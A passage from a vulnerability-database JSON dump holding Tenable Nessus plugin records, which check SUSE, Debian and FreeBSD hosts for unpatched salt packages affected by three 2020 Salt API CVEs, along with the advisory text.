(rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-master-3000-6.51.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-minion-3000-6.51.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-proxy-3000-6.51.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-ssh-3000-6.51.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-standalone-formulas-configuration-3000-6.51.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"salt-syndic-3000-6.51.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"python2-salt-3000-6.51.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"python3-salt-3000-6.51.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-3000-6.51.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-doc-3000-6.51.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"salt-minion-3000-6.51.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-14T06:30:25", "description": "This update for salt fixes the following issues :\n\nProperly validate eauth credentials and tokens on SSH calls made by\nSalt API (bsc#1178319, bsc#1178362, bsc#1178361, CVE-2020-25592,\nCVE-2020-17490, CVE-2020-16846)\n\nFix disk.blkid to avoid unexpected keyword argument '__pub_user'.\n(bsc#1177867)\n\nEnsure virt.update stop_on_reboot is updated with its default value.\n\nDo not break package building for systemd OSes.\n\nDrop wrong mock from chroot unit test.\n\nSupport systemd versions with dot. (bsc#1176294)\n\nFix for grains.test_core unit test.\n\nFix file/directory user and group ownership containing UTF-8\ncharacters. (bsc#1176024)\n\nSeveral changes to virtualization :\n\n - Fix virt update when cpu and memory are changed.\n\n - Memory Tuning GSoC.\n\n - Properly fix memory setting regression in virt.update.\n\n - Expose libvirt on_reboot in virt states.\n\nSupport transactional systems (MicroOS).\n\nzypperpkg module ignores retcode 104 for search(). (bsc#1159670)\n\nXen disk fixes. No longer generates volumes for Xen disks, but the\ncorresponding file or block disk. (bsc#1175987)\n\nInvalidate file list cache when cache file modified time is in the\nfuture. (bsc#1176397)\n\nPrevent import errors when running test_btrfs unit tests.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 3, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-12-09T00:00:00", "title": "SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:3155-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16846", "CVE-2020-25592", "CVE-2020-17490"], "modified": "2020-12-09T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:salt-cloud", "p-cpe:/a:novell:suse_linux:salt-ssh", "p-cpe:/a:novell:suse_linux:salt-proxy", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:python2-salt", "p-cpe:/a:novell:suse_linux:salt", "p-cpe:/a:novell:suse_linux:salt-master", "p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration", "p-cpe:/a:novell:suse_linux:salt-doc", "p-cpe:/a:novell:suse_linux:python3-salt", "p-cpe:/a:novell:suse_linux:salt-syndic", "p-cpe:/a:novell:suse_linux:salt-minion", "p-cpe:/a:novell:suse_linux:salt-api"], "id": "SUSE_SU-2020-3155-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143874", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:3155-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143874);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2020-16846\", \"CVE-2020-17490\", \"CVE-2020-25592\");\n\n script_name(english:\"SUSE SLED15 / SLES15 Security Update : salt (SUSE-SU-2020:3155-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for salt fixes the following issues :\n\nProperly validate eauth credentials and tokens on SSH calls made by\nSalt API (bsc#1178319, bsc#1178362, bsc#1178361, CVE-2020-25592,\nCVE-2020-17490, CVE-2020-16846)\n\nFix disk.blkid to avoid unexpected keyword argument '__pub_user'.\n(bsc#1177867)\n\nEnsure virt.update stop_on_reboot is updated with its default value.\n\nDo not break package building for systemd OSes.\n\nDrop wrong mock from chroot unit test.\n\nSupport systemd versions with dot. (bsc#1176294)\n\nFix for grains.test_core unit test.\n\nFix file/directory user and group ownership containing UTF-8\ncharacters. (bsc#1176024)\n\nSeveral changes to virtualization :\n\n - Fix virt update when cpu and memory are changed.\n\n - Memory Tuning GSoC.\n\n - Properly fix memory setting regression in virt.update.\n\n - Expose libvirt on_reboot in virt states.\n\nSupport transactional systems (MicroOS).\n\nzypperpkg module ignores retcode 104 for search(). (bsc#1159670)\n\nXen disk fixes. No longer generates volumes for Xen disks, but the\ncorresponding file or block disk. (bsc#1175987)\n\nInvalidate file list cache when cache file modified time is in the\nfuture. (bsc#1176397)\n\nPrevent import errors when running test_btrfs unit tests.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1159670\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1175987\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176024\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176294\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176397\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1177867\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178319\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178361\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1178362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-16846/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-17490/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-25592/\"\n );\n # https://www.suse.com/support/update/announcement/2020/suse-su-20203155-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7856e666\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Server Applications 15-SP2 :\n\nzypper in -t patch\nSUSE-SLE-Module-Server-Applications-15-SP2-2020-3155=1\n\nSUSE Linux Enterprise Module for Python2 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Python2-15-SP2-2020-3155=1\n\nSUSE Linux Enterprise Module for Basesystem 15-SP2 :\n\nzypper in -t patch SUSE-SLE-Module-Basesystem-15-SP2-2020-3155=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED15 / SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED15 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"python2-salt-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"python3-salt-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-api-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-cloud-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-doc-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-master-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-minion-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-proxy-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-ssh-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-standalone-formulas-configuration-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"2\", reference:\"salt-syndic-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"python2-salt-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"python3-salt-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"salt-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"salt-doc-3000-4.20.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"2\", reference:\"salt-minion-3000-4.20.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-10T09:37:11", "description": "Several vulnerabilities were discovered in salt.\n\nCVE-2020-16846\n\nAn unauthenticated user with network access to the Salt API can use\nshell injections to run code on the Salt-API using the SSH client\n\nCVE-2020-17490\n\nWhen using the functions create_ca, create_csr, and\ncreate_self_signed_cert in the tls execution module, it would not\nensure the key was created with the correct permissions.\n\nCVE-2020-25592\n\nProperly validate eauth credentials and tokens along with their Access\nControl Lists – ACLs. Prior to this change, eauth was not\nproperly validated when calling Salt SSH via the salt-api. Any value\nfor 'eauth' or 'token' would allow a user to\nbypass authentication and make calls to Salt SSH\n\nFor Debian 9 stretch, these problems have been fixed in version\n2016.11.2+ds-1+deb9u6.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/salt\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 2, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-12-07T00:00:00", "title": "Debian DLA-2480-1 : salt security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16846", "CVE-2020-25592", "CVE-2020-17490"], "modified": "2020-12-07T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:salt-syndic", "p-cpe:/a:debian:debian_linux:salt-proxy", "p-cpe:/a:debian:debian_linux:salt-master", "p-cpe:/a:debian:debian_linux:salt-common", "p-cpe:/a:debian:debian_linux:salt-cloud", "p-cpe:/a:debian:debian_linux:salt-ssh", "p-cpe:/a:debian:debian_linux:salt-api", "p-cpe:/a:debian:debian_linux:salt-minion", "p-cpe:/a:debian:debian_linux:salt-doc", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2480.NASL", "href": "https://www.tenable.com/plugins/nessus/143512", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2480-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143512);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/09\");\n\n script_cve_id(\"CVE-2020-16846\", \"CVE-2020-17490\", \"CVE-2020-25592\");\n\n script_name(english:\"Debian DLA-2480-1 : salt security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities were discovered in salt.\n\nCVE-2020-16846\n\nAn unauthenticated user with network access to the Salt API can use\nshell injections to run code on the Salt-API using the SSH client\n\nCVE-2020-17490\n\nWhen using the functions create_ca, create_csr, and\ncreate_self_signed_cert in the tls execution module, it would not\nensure the key was created with the correct permissions.\n\nCVE-2020-25592\n\nProperly validate eauth credentials and tokens along with their Access\nControl Lists – ACLs. Prior to this change, eauth was not\nproperly validated when calling Salt SSH via the salt-api. Any value\nfor 'eauth' or 'token' would allow a user to\nbypass authentication and make calls to Salt SSH\n\nFor Debian 9 stretch, these problems have been fixed in version\n2016.11.2+ds-1+deb9u6.\n\nWe recommend that you upgrade your salt packages.\n\nFor the detailed security status of salt please refer to its security\ntracker page at: https://security-tracker.debian.org/tracker/salt\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/12/msg00007.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/salt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/salt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/07\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"salt-api\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-cloud\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-common\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-doc\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-master\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-minion\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-proxy\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-ssh\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"salt-syndic\", reference:\"2016.11.2+ds-1+deb9u6\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-21T02:50:10", "description": "SaltStack reports multiple security vulnerabilities in Salt 3002 :\n\n- CVE-2020-16846: Prevent shell injections in netapi ssh client.\n\n- CVE-2020-17490: Prevent creating world readable private keys with\nthe tls execution module.\n\n- CVE-2020-25592: Properly validate eauth credentials and tokens along\nwith their ACLs. Prior to this change eauth was not properly validated\nwhen calling Salt ssh via the salt-api. Any value for 'eauth' or\n'token' would allow a user to bypass authentication and make calls to\nSalt ssh.", "edition": 3, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-11-12T00:00:00", "title": "FreeBSD : salt -- multiple vulnerabilities (50259d8b-243e-11eb-8bae-b42e99975750)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-16846", "CVE-2020-25592", "CVE-2020-17490"], "modified": "2020-11-12T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:py38-salt", "cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:py36-salt", "p-cpe:/a:freebsd:freebsd:py37-salt"], "id": "FREEBSD_PKG_50259D8B243E11EB8BAEB42E99975750.NASL", "href": "https://www.tenable.com/plugins/nessus/142856", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(142856);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/20\");\n\n script_cve_id(\"CVE-2020-16846\", \"CVE-2020-17490\", \"CVE-2020-25592\");\n\n script_name(english:\"FreeBSD : salt -- multiple vulnerabilities (50259d8b-243e-11eb-8bae-b42e99975750)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"SaltStack reports multiple security vulnerabilities in Salt 3002 :\n\n- CVE-2020-16846: Prevent shell injections in netapi ssh client.\n\n- CVE-2020-17490: Prevent creating world readable private keys with\nthe tls execution module.\n\n- CVE-2020-25592: Properly validate eauth credentials and tokens along\nwith their ACLs. Prior to this change eauth was not properly validated\nwhen calling Salt ssh via the salt-api. Any value for 'eauth' or\n'token' would allow a user to bypass authentication and make calls to\nSalt ssh.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://docs.saltstack.com/en/latest/topics/releases/3002.1.html\"\n );\n # https://vuxml.freebsd.org/freebsd/50259d8b-243e-11eb-8bae-b42e99975750.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?694fdb6a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-25592\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt REST API Arbitrary Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py36-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py37-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py38-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", 